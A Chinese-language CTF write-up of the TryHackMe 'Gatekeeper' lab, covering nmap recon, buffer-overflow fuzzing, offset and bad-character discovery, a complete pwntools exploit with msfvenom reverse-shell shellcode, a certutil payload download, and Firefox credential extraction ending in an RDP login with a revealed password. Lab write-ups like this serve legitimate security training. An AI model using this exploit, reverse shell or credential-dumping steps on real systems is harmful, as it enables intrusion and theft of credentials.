首页 > 其他分享 >tryhackme-Gatekeeper(守门人)

tryhackme-Gatekeeper(守门人)

时间:2024-07-14 17:41:26浏览次数:14  
标签:Gatekeeper Windows 守门人 tcp payload x20 open Hello tryhackme

信息收集

首先使用nmap进行端口扫描,结果如下

nmap -sT -p- --min-rate 10000 -oA openPort
nmap -sV -O -A -p port1,port2,portN -oA version
nmap --script=smb..  -p 135,139,445 -oA 445Port
# Nmap 7.94SVN scan initiated Sat Jul 13 23:05:09 2024 as: nmap -sT -p- --min-rate 10000 -oA openPort 10.10.130.100
Warning: 10.10.130.100 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.130.100
Host is up (0.24s latency).
Not shown: 65262 closed tcp ports (conn-refused), 262 filtered tcp ports (no-response)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
31337/tcp open  Elite
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49163/tcp open  unknown
49164/tcp open  unknown

# Nmap done at Sat Jul 13 23:05:39 2024 -- 1 IP address (1 host up) scanned in 30.48 seconds
# Nmap 7.94SVN scan initiated Sat Jul 13 23:07:13 2024 as: nmap -sV -O -A --min-rate 10000 -oA version -p 135,139,445,3389,31337,49152-49155,49163-49164 10.10.130.100
Nmap scan report for 10.10.130.100
Host is up (0.25s latency).

PORT      STATE SERVICE        VERSION
135/tcp   open  msrpc          Microsoft Windows RPC
139/tcp   open  netbios-ssn    Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds   Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ms-wbt-server?
|_ssl-date: 2024-07-14T03:10:14+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=gatekeeper
| Not valid before: 2024-07-13T03:05:08
|_Not valid after:  2025-01-12T03:05:08
| rdp-ntlm-info: 
|   Target_Name: GATEKEEPER
|   NetBIOS_Domain_Name: GATEKEEPER
|   NetBIOS_Computer_Name: GATEKEEPER
|   DNS_Domain_Name: gatekeeper
|   DNS_Computer_Name: gatekeeper
|   Product_Version: 6.1.7601
|_  System_Time: 2024-07-14T03:10:08+00:00
31337/tcp open  Elite?
| fingerprint-strings: 
|   FourOhFourRequest: 
|     Hello GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0
|     Hello
|   GenericLines: 
|     Hello 
|     Hello
|   GetRequest: 
|     Hello GET / HTTP/1.0
|     Hello
|   HTTPOptions: 
|     Hello OPTIONS / HTTP/1.0
|     Hello
|   Help: 
|     Hello HELP
|   Kerberos: 
|     Hello !!!
|   LDAPSearchReq: 
|     Hello 0
|     Hello
|   LPDString: 
|     Hello 
|     default!!!
|   RTSPRequest: 
|     Hello OPTIONS / RTSP/1.0
|     Hello
|   SIPOptions: 
|     Hello OPTIONS sip:nm SIP/2.0
|     Hello Via: SIP/2.0/TCP nm;branch=foo
|     Hello From: <sip:nm@nm>;tag=root
|     Hello To: <sip:nm2@nm2>
|     Hello Call-ID: 50000
|     Hello CSeq: 42 OPTIONS
|     Hello Max-Forwards: 70
|     Hello Content-Length: 0
|     Hello Contact: <sip:nm@nm>
|     Hello Accept: application/sdp
|     Hello
|   SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|_    Hello
49152/tcp open  msrpc          Microsoft Windows RPC
49153/tcp open  msrpc          Microsoft Windows RPC
49154/tcp open  msrpc          Microsoft Windows RPC
49155/tcp open  msrpc          Microsoft Windows RPC
49163/tcp open  msrpc          Microsoft Windows RPC
49164/tcp open  msrpc          Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port31337-TCP:V=7.94SVN%I=7%D=7/13%Time=669340EF%P=x86_64-pc-linux-gnu%
SF:r(GetRequest,24,"Hello\x20GET\x20/\x20HTTP/1\.0\r!!!\nHello\x20\r!!!\n"
SF:)%r(SIPOptions,142,"Hello\x20OPTIONS\x20sip:nm\x20SIP/2\.0\r!!!\nHello\
SF:x20Via:\x20SIP/2\.0/TCP\x20nm;branch=foo\r!!!\nHello\x20From:\x20<sip:n
SF:m@nm>;tag=root\r!!!\nHello\x20To:\x20<sip:nm2@nm2>\r!!!\nHello\x20Call-
SF:ID:\x2050000\r!!!\nHello\x20CSeq:\x2042\x20OPTIONS\r!!!\nHello\x20Max-F
SF:orwards:\x2070\r!!!\nHello\x20Content-Length:\x200\r!!!\nHello\x20Conta
SF:ct:\x20<sip:nm@nm>\r!!!\nHello\x20Accept:\x20application/sdp\r!!!\nHell
SF:o\x20\r!!!\n")%r(GenericLines,16,"Hello\x20\r!!!\nHello\x20\r!!!\n")%r(
SF:HTTPOptions,28,"Hello\x20OPTIONS\x20/\x20HTTP/1\.0\r!!!\nHello\x20\r!!!
SF:\n")%r(RTSPRequest,28,"Hello\x20OPTIONS\x20/\x20RTSP/1\.0\r!!!\nHello\x
SF:20\r!!!\n")%r(Help,F,"Hello\x20HELP\r!!!\n")%r(SSLSessionReq,C,"Hello\x
SF:20\x16\x03!!!\n")%r(TerminalServerCookie,B,"Hello\x20\x03!!!\n")%r(TLSS
SF:essionReq,C,"Hello\x20\x16\x03!!!\n")%r(Kerberos,A,"Hello\x20!!!\n")%r(
SF:FourOhFourRequest,47,"Hello\x20GET\x20/nice%20ports%2C/Tri%6Eity\.txt%2
SF:ebak\x20HTTP/1\.0\r!!!\nHello\x20\r!!!\n")%r(LPDString,12,"Hello\x20\x0
SF:1default!!!\n")%r(LDAPSearchReq,17,"Hello\x200\x84!!!\nHello\x20\x01!!!
SF:\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 R2 (97%), Microsoft Windows Home Server 2011 (Windows Server 2008 R2) (96%), Microsoft Windows Server 2008 SP1 (96%), Microsoft Windows Server 2008 SP2 (96%), Microsoft Windows 7 (96%), Microsoft Windows 7 SP0 - SP1 or Windows Server 2008 (96%), Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 (96%), Microsoft Windows 7 SP1 (96%), Microsoft Windows 7 Ultimate (96%), Microsoft Windows 7 Ultimate SP1 or Windows 8.1 Update 1 (96%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: GATEKEEPER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: GATEKEEPER, NetBIOS user: <unknown>, NetBIOS MAC: 02:d8:aa:d3:b1:8d (unknown)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: gatekeeper
|   NetBIOS computer name: GATEKEEPER\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-07-13T23:10:07-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 48m00s, deviation: 1h47m20s, median: 0s
| smb2-time: 
|   date: 2024-07-14T03:10:07
|_  start_date: 2024-07-14T03:05:02

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   249.25 ms 10.9.0.1
2   249.34 ms 10.10.130.100

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul 13 23:10:14 2024 -- 1 IP address (1 host up) scanned in 181.09 seconds
# Nmap 7.94SVN scan initiated Sat Jul 13 23:10:30 2024 as: nmap --script=smb-enum-users.nse,smb-enum-shares.nse,smb-vuln-ms17-010.nse -p135,139,445 -oA /home/kali/Gatekeeper/445Port 10.10.130.100
Nmap scan report for 10.10.130.100
Host is up (0.25s latency).

PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.130.100\ADMIN$: 
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Remote Admin
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.130.100\C$: 
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Default share
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.130.100\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: Remote IPC
|     Anonymous access: READ
|     Current user access: READ/WRITE
|   \\10.10.130.100\Users: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Anonymous access: <none>
|_    Current user access: READ

# Nmap done at Sat Jul 13 23:11:22 2024 -- 1 IP address (1 host up) scanned in 52.26 seconds

通过扫描结果发现开放对我们有用的端口有445 3389 31337
首先上述的扫描结果中445端口有一个Users目录拥有读取权限,连接发现程序gatekeeper.exe,将其下载

在本地虚拟机中运行

进入了监听状态,应该是开放了一个端口,根据扫描的结果31337,猜测该程序可能就会开启31337端口,使用netstat -an -p tcp查看

使用nc连接查看

该程序可能存在栈溢出漏洞,访问靶机的31337端口是否和该程序一样

可以看到是一样的程序

接下来的思路就是使用debug工具对该程序进行栈溢出漏洞调试并利用,和之前学习的步骤类似,这里就不在详细讲解

漏洞调试

我自己使用pwntools写了一个fuzz简易脚本

import time
from pwn import *
# context(log_level="debug")


padding = b"A" * 50
while True:
	try:
		p = remote("192.168.226.132",31337)

		p.sendline(padding)
		print(f"send {len(padding)} bytes Test!")
		p.recv()
	except:
		print(f"at {len(padding)} bytes error")
	padding += b"A" * 50
	time.sleep(1)

该程序每次回多增加50个字符到缓冲区,将程序使用debug程序运行

运行脚本


脚本在150个字符卡住了,接着测试在那个字符造成溢出,我自己写了一个脚本,如下

from pwn import *
context(log_level='debug')

offset = 0
payload = b"A" * offset
payload += b""

p = remote("10.10.163.211",31337)
p.sendline(payload)

p.recv()

使用msf-pattern_create生成150个字符,填充到payload += b""变量中

from pwn import *
context(log_level='debug')

offset = 0
payload = b"A" * offset
payload += b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9"

p = remote("10.10.163.211",31337)
p.sendline(payload)

p.recv()

接着重启程序,运行脚本

EIP复制使用msf-pattern_offset查找字符偏移


缓冲区的大小为146,将该值替换到offset变量中

offset = 146

接着将脚本中之前的垃圾字符删除,加上一条payload += b"BBBB"代码

from pwn import *
context(log_level='debug')

offset = 146
payload = b"A" * offset
payload += b"BBBB"

p = remote("192.168.226.132",31337)
p.sendline(payload)

p.recv()

重启程序,再次运行脚本,这次EIP为漏洞验证,EIP的值应该被覆盖为了42424242


成功了
接着生成除了\x00的所有坏字符,测试坏字符

!mona bytearray -b "\x00"


将坏字符加入脚本中

from pwn import *
context(log_level='debug')

offset = 146
payload = b"A" * offset
payload += b"BBBB"
payload += (
	b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
	b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
	b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
	b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
	b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
	b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
	b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
	b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)

p = remote("192.168.226.132",31337)
p.sendline(payload)

p.recv()

重启程序,再次运行脚本


复制ESP运行mona插件查找坏字符

!mona compare -f C:\mona\gatekeeper\bytearray.bin -a 009E19E4


坏字符为\x00\x0a,接着查找jmp esp

!mona jmp -r esp -cpb "\x00\x0a"


将地址使用小端排序存储填充到BBBB

payload += b"\xc3\x14\x04\x08"	# 0x080414c3 

接着生成shellcode,往下继续拼接payload

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.226.131 LPORT=4444 EXITFUNC=thread -b "\x00\x0a" -f c

为了shellcode正常执行,需要填充一些nop,\x90,最终的脚本如下

from pwn import *
context(log_level='debug')

offset = 146
payload = b"A" * offset
payload += b"\xc3\x14\x04\x08"	# 0x080414c3 
payload += b"\x90" * 16
payload += (
	b"\xdb\xc2\xba\xdb\x7f\xc7\xbd\xd9\x74\x24\xf4\x5b\x31\xc9"
	b"\xb1\x52\x31\x53\x17\x83\xc3\x04\x03\x88\x6c\x25\x48\xd2"
	b"\x7b\x2b\xb3\x2a\x7c\x4c\x3d\xcf\x4d\x4c\x59\x84\xfe\x7c"
	b"\x29\xc8\xf2\xf7\x7f\xf8\x81\x7a\xa8\x0f\x21\x30\x8e\x3e"
	b"\xb2\x69\xf2\x21\x30\x70\x27\x81\x09\xbb\x3a\xc0\x4e\xa6"
	b"\xb7\x90\x07\xac\x6a\x04\x23\xf8\xb6\xaf\x7f\xec\xbe\x4c"
	b"\x37\x0f\xee\xc3\x43\x56\x30\xe2\x80\xe2\x79\xfc\xc5\xcf"
	b"\x30\x77\x3d\xbb\xc2\x51\x0f\x44\x68\x9c\xbf\xb7\x70\xd9"
	b"\x78\x28\x07\x13\x7b\xd5\x10\xe0\x01\x01\x94\xf2\xa2\xc2"
	b"\x0e\xde\x53\x06\xc8\x95\x58\xe3\x9e\xf1\x7c\xf2\x73\x8a"
	b"\x79\x7f\x72\x5c\x08\x3b\x51\x78\x50\x9f\xf8\xd9\x3c\x4e"
	b"\x04\x39\x9f\x2f\xa0\x32\x32\x3b\xd9\x19\x5b\x88\xd0\xa1"
	b"\x9b\x86\x63\xd2\xa9\x09\xd8\x7c\x82\xc2\xc6\x7b\xe5\xf8"
	b"\xbf\x13\x18\x03\xc0\x3a\xdf\x57\x90\x54\xf6\xd7\x7b\xa4"
	b"\xf7\x0d\x2b\xf4\x57\xfe\x8c\xa4\x17\xae\x64\xae\x97\x91"
	b"\x95\xd1\x7d\xba\x3c\x28\x16\x05\x68\xd0\x65\xed\x6b\x14"
	b"\x7b\xb2\xe2\xf2\x11\x5a\xa3\xad\x8d\xc3\xee\x25\x2f\x0b"
	b"\x25\x40\x6f\x87\xca\xb5\x3e\x60\xa6\xa5\xd7\x80\xfd\x97"
	b"\x7e\x9e\x2b\xbf\x1d\x0d\xb0\x3f\x6b\x2e\x6f\x68\x3c\x80"
	b"\x66\xfc\xd0\xbb\xd0\xe2\x28\x5d\x1a\xa6\xf6\x9e\xa5\x27"
	b"\x7a\x9a\x81\x37\x42\x23\x8e\x63\x1a\x72\x58\xdd\xdc\x2c"
	b"\x2a\xb7\xb6\x83\xe4\x5f\x4e\xe8\x36\x19\x4f\x25\xc1\xc5"
	b"\xfe\x90\x94\xfa\xcf\x74\x11\x83\x2d\xe5\xde\x5e\xf6\x05"
	b"\x3d\x4a\x03\xae\x98\x1f\xae\xb3\x1a\xca\xed\xcd\x98\xfe"
	b"\x8d\x29\x80\x8b\x88\x76\x06\x60\xe1\xe7\xe3\x86\x56\x07"
	b"\x26"
)

p = remote("192.168.226.132",31337)
p.sendline(payload)

p.recv()

重启程序,监听4444,运行脚本获得反弹shell

获取FLAG

同样的步骤只需要修改IP运行即可获取靶机的反弹shell

获取user.txt

权限提升

虽然没有成功记录一下我的思路,首先在生成反弹shell代码的时候可以直接反弹meterpreter,但是这里我生成的反弹的是普通的shell,我需要提升为meterpreter的终端
于是我生成了一个shell.exe,然后使用python -m http.server 80共享,靶机使用certutil -split -f -urlcache下载,于是我得到一个meterpreter终端

接着我尝试使用post/multi/recon/local_exploit_suggester来查找可能存在的提权

我在尝试最后一个的时候并没有获取shell,不知道为什么

然后使用winPEAS没有回显,手动收集没有得到实际用途的信息,于是就没有了头绪,参考博客发现是firefox中保存的凭据
使用firefox_creds保存凭据


我更改了名称

接着需要使用github上的一个脚本解析这些凭据,地址: https://github.com/unode/firefox_decrypt/blob/main/firefox_decrypt.py
运行后得到mayor用户的凭据

python firefox_decrypt.py ./firefox

./firefox文件夹中保存着导出的所有凭据

接着使用xfreerdp连接到靶机

xfreerdp /u:mayor /p:8CL7O1N78MdrCIsV /sec:rdp /v:10.10.163.211 +clipboard

得到root.txt

实验结束。

标签:Gatekeeper,Windows,守门人,tcp,payload,x20,open,Hello,tryhackme
From: https://www.cnblogs.com/Junglezt/p/18301641

相关文章

  • tryhackme-Buffer Overflow Prep(缓冲区溢出准备)
    前景概述最开始接触二进制方式是因为参加比赛缺少一个pwn手,慢慢的学习在二进制方面懂了很多,学习了C和C++、基本的汇编语法、pwndbg、ollydbg等调试工具,以及在做pwn题目是相关的工具pwntools,学习了栈相关的基本知识,栈溢出相关的一些姿势,例如:ret2text、ret2plt、ret2shellcode、......
  • OPA Gatekeeper:Kubernetes的策略和管理
    目录一.系统环境二.前言三.OPAGatekeeper简介四.在kubernetes上安装OPAGatekeeper五.gatekeeper规则5.1使用gatekeeper禁止某些网站的镜像创建pod5.2使用gatekeeper禁止创建LoadBalancer类型的Services服务六.总结一.系统环境本文主要基于Kubernetes1.22.2和Linux操作系统Ub......
  • tryhackme-Boiler CTF
    信息收集使用nmap对靶机进行信息收集根据扫描开放的端口,先访问21端口进行初步探测并没有得到有用的提示,继续访问80端口进行探测根据页面回显,靶机应该是一个ubuntu的操作系统,可能有隐藏目录,使用gobuster进行目录扫描gobusterdir-uhttp://10.10.229.228/-w/usr/share/......
  • TryHackMe - Alfred
    本文相关TryHackMe实验房间链接:TryHackMe|WhySubscribe本文相关介绍:本次实验我们将学习如何利用Jenkins的错误配置来获取目标的初始shell,然后再利用Windows身份验证令牌(tokens)执行权限提升。 本次实验目标IP:10.10.152.218Task1-InitialAccess(初始访问)利......
  • tryhackme-Expose(暴露)
    信息收集使用nmap对靶机进行端口扫描这里我在枚举21端口和1883端口并没有获得任何信息,接着访问1337端口进行信息收集什么都没有,接着进行目录扫描这里由于我的wordlists的问题,并没有扫描到想要的目录,不过也扫描到了一些常规的目录通过参考wp,得到目录名为admin_101,其实在/a......
  • tryhackme-Valley(古)
    信息收集首先对靶机进行端口扫描占时扫描到开放端口22和80端口,访问80端口有两个按钮,一个按钮是展示的照片,一个按钮是照片的价格,这里透漏了一些个人信息,例如用户名可能为Valley,他的公司是premire自习观察url得到两个目录pricing和gallery,访问查看访问note.txt并没有......
  • tryhackme-Retro(复古的)
    题目没有给太多的描述,但是根据硬币,复古的得知这是一个像素,复古,FC游戏的爱好者,之前游戏厅里的游戏信息收集首先对靶机进行端口扫描通过扫描得知一共开放80和3389这两个端口访问80端口发现是IIS的默认页面使用gobuster进行目录扫描扫描到/retro目录,访问该页面这里我访问......
  • tryhackme-Anthem(国歌)
    根据题目描述,这是一个让我们练习的简单Windows机器信息收集首先对靶机进行端口扫描加入-Pn参数是因为Windows默认开启防火墙拒绝icmpping数据包根据开放端口80和3389猜测到后续可能会远程连接靶机接着访问80端口进行信息收集根据title和网页标题,可以看出网站的域名为Anth......
  • tryhackme-Source(来源)
    根据题目描述,这是一个webmin的应用程序,虽然没有了解过,可以通过开源信息搜索查看通过官网可以看出,这是一个资源信息态势图信息收集使用nmap进行端口扫描暂时扫描出靶机开放两个端口22和10000端口访问10000端口发现下方提示,说明服务运行在SSLmode,也就是使用https访问进入......
  • tryhackme-Res(资源)
    这是我第一次接触redis,这个题目是最简单的信息收集使用nmap进行端口扫描根据扫描结果,开放了80端口和6379端口(redis)服务对80端口进行目录扫描没有得到任何有用的信息,占时没太大用处根据改题目的描述和题目名称,改题目需要对redis服务进行下手,在网上查找到了redis服务渗透......